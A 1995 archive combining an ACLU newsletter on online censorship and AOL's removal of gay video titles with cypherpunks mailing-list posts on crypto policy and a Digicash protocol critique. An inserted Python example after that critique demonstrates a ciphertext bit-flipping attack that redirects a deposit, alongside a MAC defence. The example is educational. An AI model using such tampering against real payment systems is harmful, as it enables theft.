IN THIS ISSUE:

*    ACLU Announces Plans to Challenge Online Censorship Provisions in Court;
Says That House Conference Vote Leaves No Other Options

*     AOL Censors Gay Video Titles, Finds "Buns" Acceptable but "Studs" Too
Sleazy

*     ACLU Speaks on Cyber-Liberties

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------
*    ACLU Announces Plans to Challenge Online Censorship Provisions in
Court; Says That House Conference Vote Leaves No Other Options

FOR IMMEDIATE RELEASE
Contact: Phil Gutis  202-675-2312

WASHINGTON -- Saying that it could not depend on Congress to protect free
speech on the Internet, the American Civil Liberties Union said today that it
would challenge in court any of the online censorship proposals now being
considered by a House-Senate conference committee. 

In a vote today, the House members of the Congressional conference committee
on the telecommunications bill betrayed their chamber's earlier vote to
reject censorship on the Internet.

"All of Congress's proposals violate the First Amendment and privacy rights
of adults to communicate freely in the online environment," said Barry
Steinhardt, ACLU Associate Director. "Congress is making it ever more clear
that we will have to turn to the courts to uphold free speech in the
promising new medium of cyberspace."  

The ACLU rejected as unconstitutional the proposals offered by Senator J.
James Exon, D-Nebraska, Senator Charles E. Grassley, R-Iowa, and
Representative Henry Hyde, R-Illinois, as well as the one offered by
Representative Rick White, R-Washington.

The House conferees voted today on how to respond to the Senate's provisions
on Internet censorship. Although they first adopted the White censorship
proposal -- which the media widely and inaccurately portrayed as a compromise
-- they then amended it to include the Senate's standard for censorship.

Last August, the House won widespread praise from the online community when
it adopted an amendment to encourage Internet providers to better develop
screening technologies for parents to use in controlling what their children
see in cyberspace. House Speaker Newt Gingrich went as far as to call the
Senate version of the legislation a clear "violation of free speech" and a
"violation of the right of adults to communicate with each other."

"Unfortunately," said ACLU Legislative Counsel Donald Haines, "the House
members graciously accepted their applause for opposing censorship and then,
in a legislative sleight of hand, turned right around and came up with their
own scheme to censor what people say and see on the Internet."

The ACLU said that it would continue to work in Congress to keep the Internet
free. "Regardless of how the bill turns out," said Haines, "both the House
and Senate need to continue to hear that their censorship is simply not
acceptable."

The House conferees' vote today removes the best chance that a
telecommunications bill will emerge without an Internet censorship provision,
the ACLU said.

"If Congress adopts either the White or Exon censorship schemes -- which
appears increasingly likely -- they will force us to turn to the Courts and
we will sue," Steinhardt said.  

More than 25 civil liberties groups, regional Internet service providers, and
commercial producers of entertainment, information, and journalism joined an
ACLU letter, delivered earlier today, that urged the conferees to reject all
proposals to impose new government censorship regulations on cyberspace and
online communications.

The ACLU said that, interestingly enough, the groups and individuals who are
eager to challenge the censorship provisions should they become law have
communicated with the ACLU via the Internet. 

Online political columnists, distributors of gay and lesbian resources, human
rights groups, academic researchers of human sexuality, AIDS education
groups, prisoners' rights groups, and student groups with controversial web
pages have all already approached the ACLU about being plaintiffs in a court
challenge. The groups said that they fear prosecution because they use online
services to post, exchange, or distribute material that could be deemed
"indecent" under the proposed law. 

-------------------------
For a copy of the coalition letter sent to the conferees, send a message to
infoaclu@aclu.org with "letter opposing White and Hyde" in the subject line.

The following organizations signed the letter:

American Civil Liberties Union
American Booksellers Foundation for Free Expression
American Communication Association
Art and Technology Society
Association of Alternative Newsweeklies
Boston Coalition for Freedom of Expression
Coalition for Academic Freedom of Expression, Carnegie Mellon University
Council of Literary Magazines and Presses
Datalytics, Inc.
Electronic Privacy Information Center
Feminists for Free Expression
Filz and Associates, Inc.
HotWired Magazine
Human Rights Watch
Justice on Campus Project
Internet Users Consortium
LitNet (The Literary Network)
Lumberyard BBS Community Network
MIT Student Association for Freedom of Expression
Media Democracy in Action Consortium (MeDIA Consortium)
National Campaign for Freedom of Expression
National Coalition Against Censorship
National Writers Union
NorthWest Feminist Anti-Censorship Taskforce
Oregon Coast Rural Information Service Cooperative
Pacific Online Access
Public Access Networks Corp. (Panix)
The Society for Human Sexuality, University of Washington
Wired Magazine

----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
----------------------------------------------------------------
*     AOL Censors Gay Video Titles, Finds "Buns" Acceptable but "Studs" Too
Sleazy

AOL customers won't be surprised to hear that the AOL censors are at it
again.  AOL has long had a policy of screening certain "dirty words" from its
public bulletin boards and chat groups.  Last week, The Boston Globe reported
that AOL had banned the word "breast."  The company agreed to reverse the
policy after "several days of on-line protests by irate breast cancer
patients."  Richard A. Knox, "Women Go Online To Decry Ban On 'Breast,'" The
Boston Globe, 12/1/95.

Another example of AOL's attempt to use censorship to create a
"family-friendly" service was recently brought to the ACLU's attention.

Jeff Satkin is owner and operator of ATKOL Gay Videos, a mail-order gay video
store headquartered in Plainfield, NJ.  Last August, Jeff responded to AOL's
bid for new business by signing up as an advertiser on "Downtown AOL" (DT
AOL).  AOL describes the site as "a virtual small business community where
potential customers will come to browse and shop for products and services of
all types."  Jeff paid the advertising fee and sent AOL an electronic copy of
his extensive mail-order video catalog for posting on the DT AOL site.  Under
the contract, AOL agreed to run the ad for a term of one year. According to
Jeff, AOL posted the catalog in full for four weeks with no complaints.

Then, in September, AOL sent Jeff a letter requesting that a huge percentage
of titles in the ATKOL Video mail-order catalog be removed from the online
version of the catalog that appeared on Downtown AOL.  An AOL employee had
gone through a printed version of the list and highlighted the offending
titles that would need to be removed.   The result is a hilarious but
frightening example of arbitrary censorship.

At the ACLU's suggestion, Jeff wrote to AOL and asked them to explain the
guidelines they used for censoring his catalog.  After considerable delay,
AOL wrote back the following:

"DT AOL does not have any written standards for its advertisements.  As the
manager of the area I determine whether an advertisement has the look and
feel that best fits our environment.  I edited the file you sent and removed
any titles which I felt didn't reflect the image we would like to project.  I
may have missed a few as you pointed out, so feel free to remove those as
well if you would like."

Here are just a few examples of AOL's arbitrary rating system as applied to
the ATKOL Video catalog.  (And remember, these are **titles only**!! -- no
pictures, no cover art, no narrative -- just titles.)

AOL Says                        AOL Says
"Thumbs Down" --                "Thumbs Up" --

These titles were censored as   These titles were not censored --
too sleazy for AOL!:            they must have had "the look and
                                feel that best fits the AOL environment":

A Brother's Desire              A Family Affair
Advanced Disrobics              Lockerroom Fever
All About Sex                   ABC's of Sex
All the Right Stuff             All Men Do It!
As the Bed Turns                Bed Tales
Bare Bones                      Bareback
Bedroom Eyes                    Bedroom Lies
Bi 'N Large                     Bi-Conflict
The Big Nasty                   The Big Drill
Bigger Than Huge                Bigger Than Life
Black Magic                     Magic Choices
Black Dudes                     Blond Lovers
The Boy Next Door               Boys from New Jersey
Brotherly Love                  Brother Trouble
Buns 'N Hoses                   Bung Hole Buddies
Dirty Pictures                  Dirty Picture Show
Elements of Passion             Passion By Fire
Everybody Does It               Every Which Way
Filth                           Dirty Laundry
Gayracula                       Gay Tarzan
Hot Lunch                       Hot Stuff
Latin on the Loose              Latin Lust
Leather Angel                   Leather Report
Man in Motion                   The Man Inside
Men in Shorts                   Men with Tools
Night Maneuvers                 Nights in Black Leather
Power Grip                      Power Trip
'Rican Christmas                Latino Nights
The Rites of Spring             The Rites of Summer
Skin Deep                       Skin Tight
Spring Semester                 Spring Break
Sunday Brunch                   Summer Heat
Tough and Tender                Tough Iron
White Trash                     White on White
Wild Dreams                     Wild Thing
You Are Not Alone               Alone and Private

Titles with any of the following words, regardless of the full title, were
also censored:  "pleasure," "black," "hard," "boys," "jock," "Rican," "sex,"
"stud," "straight," "young."

A few more interesting facts about the case should be noted.  First, while
AOL has never publicized the list of "vulgar" words that it routinely screens
from its public sites, most of the screened words are classic profanity and
"dirty words."  None of the titles that AOL censored from ATKOL Video's list
contain those "dirty" words.  Second, it is clear that AOL's action was an
overreaction to the recent federal law enforcement raids on alleged child
pornographers using AOL -- Jeff received the letter shortly after the raids
made the headlines.  But *none* of Jeff's videos contain child porn.  And
again -- the info in the catalog was *titles only* and contained no
substantive material at all.

Third, it appears that AOL's arbitrary standards may be a little homophobic.
While "Wet and Wild" was an unacceptable title in a gay video catalog, AOL
ran an ad in Downtown AOL for Affinity Teleproductions, Inc. that read: "Now
you can join exotic Anna Nicole Smith on her sensuous Edenquest adventure in
her exclusive photo portfolio. . . .  Anna Nicole Smith "The Collectors Set"
features ten eye opening Edenquest photographs in vivid color . . . .  It's
all Anna Nicole Smith wet and wild drenched in sun and powder sugar sand.
"With Love, Anna Nicole" is your personal trip to paradise with the world's
most exciting woman in her most provocative photos ever."

The troubles experienced by ATKOL Video when it legitimately tried to do
business with AOL just prove once again that censorship rules are by nature
arbitrary and unfair -- whether imposed by the government or by private
industry.

----------------------------------------------------------------
ACLU Speaks on Cyber-Liberties
----------------------------------------------------------------
12/5/95     Nadine Strossen, President of the ACLU, debated Kathy Cleaver of
the American Family Research Council over online censorship proposals on
CNN's "Crossfire."

12/5/95    Barry Steinhardt, Associate Director of the ACLU, debated Bob
Peters of Morality and Media over online censorship proposals on CBS Radio
Network's Gil Gross Show.

12/7/95     Ann Beeson, ACLU cyberspace policy analyst, speaks on a panel at
the Walker Art Center in Minneapolis, Minnesota.  "Art on the Internet:
Power, Access and Desire," 7:30 p.m.  See http://bowlingalley.walkerart.org/.

Next week:   Watch the CNBC 6:00 pm news for an interview with Barry
Steinhardt on Congress' proposals to censor the net.

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu@aclu.org.
----------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Wed, 6 Dec 95 09:11:01 PST
To: cypherpunks@toad.com
Subject: Re: Netscape Bug Bounty...
Message-ID: <9512061707.AA12269@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


In .cypherpunks, Jeff Weinstein <jsw@netscape.com> writes:
>  FYI, since both the bounty and the particular bug have been discussed
>here...
>
free advert.
>  We are awarding Scott Weston $1000 for reporting the LiveScript history
>problem.  The announcement should show up on our Bug Bounty winner's
>page by tomorrow.
>

hey, that'll make a real dent in the stock price (hint: three letters,
1st is s, 2nd is e, 3rd is c).

>	--Jeff
>
>Jeff Weinstein - Electronic Munitions Specialist
why don't you at least try to be original, asshole?
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.
mostly yours, at least (except for the original parts).
thief.
>
>
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 6 Dec 95 17:19:21 PST
To: cypherpunks@toad.com
Subject: Re: Why Netscape employees should not leave
In-Reply-To: <199512040002.AA08103@ideath.goldenbear.com>
Message-ID: <30C64034.6323@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
>         This leaves us to ask, why GAK is such a big deal at NIST, if
> CKE will get them most of what they want?  First, they haven't
> realized that CKE is most of what they want.  Second, they're worried
> about the extra 10%.  Drug dealers and terrorists not using it.  (This
> points towards an eventual mandate for GAK, even if it starts out
> voluntary.  Many have noted this.)  Third, they've invested so much
> energy in the fight for GAK that they're emotionally tied to the idea,
> and they can't say 'well this would be almost as good.'

  It also allows them to stall on increasing the clearly inadequate
export key size of 40-bit, while they are working on "an alternate
solution".  Given the overwhelming negative response from industry
over GAK, it may be nothing other than a delaying action.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 6 Dec 95 17:39:18 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <9512062040.AA20810@toad.com>
Message-ID: <30C644E3.72CE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:
> Actually, I've been thinking about this quite a bit recently. I'm building
> an SSL enabled server, and client-side authentication may provide
> some help. I could see a user getting his or her public key certificate
> signed with different CA keys which assert any number of conditions,
> such as:
> 
> Key holder was born before (some particular date).
> Key holder has access to sales data for XYZ corp.
> Key holder is an adult who takes the first amendment seriously.
> 
> ... and the server would recognize different CA signatures as permitting
> different levels of access.

  This can be done with x509v3 certificate extensions.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 6 Dec 95 14:59:41 PST
To: Ernest Hua <hua@chromatic.com>
Subject: Re: The "Future" Fallacy
In-Reply-To: <9512061801.AA07656@krypton.chromatic.com>
Message-ID: <Pine.SUN.3.91.951206175944.16692D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Ernest Hua wrote:

> >
> > I think Duncan was mad at the 'soon.'  Why not today?
> 
> I think I can answer this question because I was an obnoxious little
> hacker with an Atari 800 when I was a kid.  The only thing I did not
> have was a modem and an Internet connection (thus ability to read
> sci.crypt.research etc ...)

[...]

> means, a super-smart person.  Therefore, it is not a stretch to
> believe that kids today can perform powerful encryption in the
> privacy of their own homes.

Not a stretch?  I'd say it was proven fact two years ago.  This, I 
believe, was Duncan's point.

[...]

> Ern
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@guaymas.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 6 Dec 95 15:02:28 PST
To: cypherpunks@toad.com
Subject: Still more on the Digicash protocol
Message-ID: <199512062301.SAA15714@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ian & I were talking about the Digicash protocol some more.

Hal has pointed out that payments & deposits with a wildcard in the
payment_hdr should NOT be sent in the clear, since they can be stolen
by any passive eavesdropper.

Ian has pointed out the same problem with cancellations: the payer_code
should NOT be sent in the clear, since any passive eavesdropper can
grab this info and steal the corresponding payment.

Sadly, the current Digicash client DOES send those items in the clear
(without even warning users to avoid wildcards).  Why?


Anyhow, the obvious solution is encryption.  Our new observation is
that encrypting deposits & cancellations with the mint's public key
is not enough to solve the problem.

To see this, recall how the public key encryption works: a session
key for a bulk cipher is encrypted under the public key, and the data
(e.g. userhdr, payment_hdr, coins, ...) is encrypted under the bulk
cipher.  Digicash hasn't told us yet what bulk cipher they use, but
let's assume for concreteness they use RC4.

Now I'm an attacker -- I want to modify userhdr.userID -- and then
the mint will accept the payment and deposit the coins into the wrong
account.  But this is just easy for an active attacker -- I just flip
bits in the ciphertext!  (Presumably I can guess fairly well what
plaintext value is expected for the userhdr.userID field.)

This is just a corollary of my Pet Peeve for protocol designers:

	Don't use encryption when you want message authentication;
	with encryption, you should only count on confidentiality!

Ok, so you mention that maybe Digicash uses DES-CBC or somesuch instead
of a stream cipher like RC4.  I'll briefly note that while the attack
isn't so trivial anymore, DES-CBC ciphertext is not tamper-proof -- again,
encryption does not provide message authentication.


Another nitpick from your friendly neighborhood techno-geek.  I noticed
that signatures (when used) don't cover the headers.  Since the mint uses
header information to make important decisions (e.g. the userhdr.userID
field specifies whose account a deposit should go to), shouldn't this be
signed, just as a matter of ordinary everyday paranoia?


While I'm ranting, let me also remind you of a problem Ian discovered
earlier through reverse-engineering: the payment & deposit messages aren't
encrypted, and they send
	payee (e.g. shop) identity
	payer's and payee's banks
	payer's currency-of-choice
	amount of money transferred
	description of the product
	time of payment
in the clear, accessible to any passive eavesdropper.

With traffic analysis, if payers use the default TCP connection, all
this information about them can be compiled.  If I target a payer, I'll
probably be able to record all his transactions (unless he's using
remailers or pipenet).  If I sit outside a small business, I can compile
a dossier on its buying habits.

Worse still, anonymity for the shop is worse with Digicash than with real
cash.  If I pay you real cash on a secluded street, you're fairly anonymous.
If I pay you Digicash over the Internet, any passive eavesdropper could be
recording your identity and the whole transaction.  Blech.

So Digicash's product does all sorts of neat crypto to provide you with
anonymity from the bank, but doesn't do much to provide anonymity from
eavesdroppers on the Internet.

This is exactly backwards from how I'd prioritize -- I'll trust my bank
to keep me private long before I'll trust messages sent in the clear
over the Internet (on a virtual postcard) for all to see!  Blech.


So, what should Digicash be doing to remedy these problems?

* always set up an encrypted, authenticated connection before sending
  any messages in the Digicash protocol.

  (Yes, this means shops will need to have certificates if you want
  to avoid a man-in-the-middle attack.  So be it.  Most online shops
  will be using SSL, and thus have a certificate anyhow.  You can safely
  punt on the authentication between customer <-> shop if you're not
  worried about active attacks.)

* add a big warning to the documentation: users should not use wildcards
  in payments (unless they know the dangers & are encrypting with e.g. PGP).

* sign the header stuff too.

* continue specifying the protocol at a deeper level, like you promised
  (and throw in source for security-critical modules too, eh? :-)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMYgtioZzwIn1bdtAQHx9QF+J6qWEqWcsaoVOUQ3i9qaVF8MgYdztCLg
9si9YDnjqPnFEsGTHYBjZXB8/TpOfiZe
=cBGu
-----END PGP SIGNATURE-----
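
The bit-flipping change to userhdr.userID described in the message above, and the message-authentication remedy it calls for, as an added example that is not part of the original post and is not Digicash code. The message layout, field width, keys and function names are constructed for illustration; RC4 is the bulk cipher the post assumes, the session key is taken as already shared, and HMAC-SHA256 stands in for whatever MAC a real protocol would choose.

```python
import hashlib
import hmac

# Constructed layout (an assumption): a fixed-width userID at a known offset.
USERID_OFFSET = len(b"userID=")
USERID_LEN = 8
TAG_LEN = hashlib.sha256().digest_size


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:                         # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_deposit(user_id: bytes, coins: bytes) -> bytes:
    """Hypothetical deposit message: header field followed by coin data."""
    if len(user_id) != USERID_LEN:
        raise ValueError("userID must be exactly %d bytes" % USERID_LEN)
    return b"userID=" + user_id + b";coins=" + coins


def parse_user_id(message: bytes) -> bytes:
    return message[USERID_OFFSET:USERID_OFFSET + USERID_LEN]


def flip_user_id(ciphertext: bytes, guessed_id: bytes, new_id: bytes) -> bytes:
    """What an active party can do WITHOUT the key: XOR (guess ^ new) into
    the ciphertext bytes that cover the userID field."""
    ct = bytearray(ciphertext)
    for k, (g, n) in enumerate(zip(guessed_id, new_id)):
        ct[USERID_OFFSET + k] ^= g ^ n
    return bytes(ct)


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers the whole ciphertext, header included."""
    ct = rc4(enc_key, plaintext)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()


def open_sealed(enc_key: bytes, mac_key: bytes, blob: bytes) -> bytes:
    """Verify the tag before decrypting; reject anything that was modified."""
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed: message was modified in transit")
    return rc4(enc_key, ct)


def demo():
    enc_key = bytes(range(16))                # constructed session key
    mac_key = bytes(range(16, 48))            # constructed, independent MAC key
    msg = build_deposit(b"00031337", b"<constructed coin data>")

    # Encryption only: the mint decrypts cleanly and credits another account.
    forged = flip_user_id(rc4(enc_key, msg), b"00031337", b"00066666")
    credited = parse_user_id(rc4(enc_key, forged))

    # Encrypt-then-MAC: the same modification is rejected before decryption.
    forged_blob = flip_user_id(seal(enc_key, mac_key, msg),
                               b"00031337", b"00066666")
    try:
        open_sealed(enc_key, mac_key, forged_blob)
        detected = False
    except ValueError:
        detected = True
    return credited, detected


if __name__ == "__main__":
    print(demo())
```

Decryption of the modified ciphertext raises no error on its own, which is why the header has to be covered by a MAC or signature rather than by encryption alone.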




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 6 Dec 95 15:08:38 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Untraceability in Mobile Networks
In-Reply-To: <9512060854.AA12541@supra.comm.mot.com>
Message-ID: <199512062309.SAA16230@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Loren J. Rittle writes:
> FYI, at MobiCom '95, an ACM sponsored conference, an interesting paper
> entitled, _Untraceability in Mobile Networks_, was presented.  The
> authors of the paper are Didier Samfat, Refik Molva and N. Asokan.

The same authors presented papers on similar themes at MCSA `94 (Workshop on
Mobile Computing Systems and Applications). See 
<a href="http://snapple.cs.washington.edu/mobile/mcsa94.html">the MCSA `94
home page</a>, which has links to PostScript versions of the papers. They
even had a panel on "Privacy & Anonymity", apparently !

The relevant papers are:

Anonymity in a Mobile Computing Environment 
     N. Asokan - University of Waterloo.

A Method Providing Identity Privacy to Mobile Users during Authentication 
     Didier Samfat and Refik Molva - Institut Eurecom.

On Travelling Incognito 
     A. Herzberg, H. Krawczyk - IBM T.J. Watson, and G. Tsudik - IBM Zurich. 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 6 Dec 95 15:18:39 PST
To: cypherpunks@toad.com
Subject: Re: latest librand source now av
In-Reply-To: <9512062243.AA04215@anon.penet.fi>
Message-ID: <199512062319.SAA13164@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



an116512@anon.penet.fi (Shithead) writes:
> In .cypherpunks, Matt Blaze <mab@research.att.com> writes:
> >Source code for the latest version of librand (a random
> >number package based on event interval variations) for
> >Unix-like machines is now available in:
> >  ftp://ftp.research.att.com/dist/mab/librand.shar
> 
> why the FUCK would anyone want to use random number code from at&t,
> (and mister nescape GAK apologist himself)? this the code that was
> broken by french student for christs sakes.

What drugs, exactly, have you been taking, and where can we buy them?
They are obviously very good, although it appears that you are getting
a bit of a paranoid edge from them.

(For those not in the know...

1) Matt Blaze is the guy that, among other things, embarrassed the NSA
   with his discovery of flaws in Tessera, which made the front page
   of the times.
2) His code has nothing to do with Netscape, and neither does he.)

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 6 Dec 95 16:28:06 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <199512062336.PAA13979@ix6.ix.netcom.com>
Message-ID: <9512070028.AA01359@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
 > I had interpreted the suggestion differently - rather than a system with 
 > user-accessible crypto hooks, the manufacturer could ship a binary patch
 > upgrade for US customers to install.  The internal design would presumably
 > have crypto hooks (i.e. subroutine calls); they can't ban that.

No, they can't *ban* it, but there's no reason to suspect that they
won't revoke the export license after the scheme becomes clear.  And
of course the patch itself would not be exportable.  If there's a
"wink wink nudge nudge" implication that the patch would make its way
overseas, I don't understand why that's really any more likely than
the US-only version getting out.

Note that the USGov puts definite explicit heat on corporations to
make it clear that they're serious about this stuff.  The responsible
VP for such things at one company with which I'm familiar was
explicitly reminded that he could personally be held criminally liable
for any transgressions of the export laws.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 6 Dec 95 15:45:35 PST
To: tcmay@got.net
Subject: Re: News on Congressional Debate on Exon
Message-ID: <01HYHWSWQVWG9S3RQJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The following are from NandO.net, CDT, and EFF respectively. Sorry
about the lack of editing, but I'm having editor problems. I don't know what
the "fused" bill looks like. The White one can be gotten around through tactics
such as daemons deleting "adults only" signifiers when passing through one's
(or a virally-infected) machine, or via the offshore (unfiltered) server idea.
Otherwise, everything that Congress doesn't like may wind up being accessible
only via identification.
	If it's more like the Exon & Hyde one, then we've got real problems.
That one is broad enough to be probably tossed out by the courts (or by
Clinton if he ever shows the guts).
	-Allen

  __________________________________________________________________________

      (c) 1995 Copyright Nando.net
      (c) 1995 Associated Press
      
   
   
   WASHINGTON (Dec 6, 1995 - 16:57 EST) -- House lawmakers agreed
   Wednesday on a plan that would make it illegal for a company to
   knowingly transmit sexually explicit and other "indecent" material to
   minors over computers.
   
   The agreement makes it all but certain that if legislation overhauling
   the nation's telecommunications laws is enacted, it will contain some
   of the most sweeping anti-smut provisions ever imposed on computer
   communications.
   
   The plan is part of negotiations on a larger telecommunications bill
   and settles differences among House members who were deeply divided
   over how to best limit children's exposure to smut carried on computer
   services, including the global network, Internet.
   
   The plan not only toughens an anti-smut provision contained in a
   House telecommunications bill, but brings it in line with a provision
   in the Senate's telecommunications bill.
   
   "We're on the road to an agreement that most can agree to," said Sen.
   J. James Exon, D-Neb., author of the Senate's anti-smut provision, which
   like the House plan also outlaws the transmission of indecent material
   to minors.
   
   House and Senate lawmakers serving on a committee to reconcile House-
   and Senate-passed telecommunications bills met for the second time in
   six weeks on Wednesday.
   
   "I'm determined to finish this bill," said Sen. Larry Pressler,
   R-S.D., architect of the Senate's telecommunications measure and
   chairman of the conference committee.
   
   Supporters are scrambling to bring a final bill to each chamber for a
   vote by Dec. 15. Rep. Thomas Bliley, R-Va., the primary author of the
   House bill, said the conference could be completed "within days."
   
   While the panel ended up reconciling nearly three dozen largely
   non-controversial provisions contained in both bills, it has yet to
   resolve differences on the most contentious issues -- the conditions
   by which Bell companies may enter the long-distance business and media
   ownership.
   
   A tentative agreement on another contentious issue -- cable
   deregulation -- would lift existing price regulations on all but the
   smallest cable TV systems in at least three years. Small systems would
   be deregulated upon enactment.
   
   The House's anti-smut plan -- a combination of dueling proposals from
   Rep. Rick White, R-Wash., and Henry Hyde, R-Ill., would prohibit
   content providers on a computer service from "knowingly sending or
   directly sending" sexually explicit material to anyone 18 years old
   and younger.
   
   Companies that provide access to computer networks, like America
   Online and CompuServe, would not be liable under the provision, White
   said.
   
   The Department of Justice would enforce the provision, which also
   carries criminal penalties of up to two years in jail and $100,000 in
   fines.
   
   Businesses and civil liberties groups opposed Hyde's plan to toughen
   the House's anti-smut provision by making it illegal for a content
   provider to knowingly transmit indecent materials.
   
   Instead, they had rallied behind a proposal from White, whose district
   includes the headquarters of Microsoft, that among other things, would
   have prohibited only the transmission of materials "harmful to minors"
   and would not have outlawed indecent transmissions.
   
   The Center for Democracy and Technology Policy, one of the main groups
   pushing for weaker anti-smut provisions, had no immediate comment on
   the House plan.
   
   But Mike Russell, a spokesman for the Christian Coalition, which
   backed Hyde's tougher standard, said: "It is clearly going in our
   direction. We were holding out for tougher language and it appears
   we're going to get it."
   
   Indecent speech, unlike obscenity, is protected under the First
   Amendment. Though the House plan doesn't yet specifically define
   "indecent," the standard legal and regulatory definition says it is
   material that describes in terms patently offensive, as measured by
   contemporary community standards, sexual or excretory activities or
   organs.
   
   Transmission of obscene materials whether by print, broadcast, cable
   or computers is illegal. Obscenity is something that, measured by
   community standards, lacks, among other things, serious artistic,
   political or scientific or social merit.
   
   


------------------------------------------------------------------------
   ******   ********   **************
  ********  *********  **************
  **        **      **      ***               POLICY POST
  **        **      **      ***
  **        **      **      ***               December 4, 1995
  **        **      **      ***               Number 31
  ********  *********       ***
   ******   ********        ***
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 31                      December 4, 1995

CONTENTS: (1) House Conferees to Vote Wednesday on Fate of Net
          (2) How To Subscribe To The CDT Policy Post Distribution List
          (3) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)
------------------------------------------------------------------------

(1) HOUSE CONFEREES TO VOTE WEDNESDAY ON FATE OF THE NET

On Wednesday December 6, members of the House conference committee will
vote on how to deal with the controversial "cyberporn" issue. The full
House/Senate conference committee will consider the issue within the
next two weeks.

After months of contentious debate, the conferees must now choose
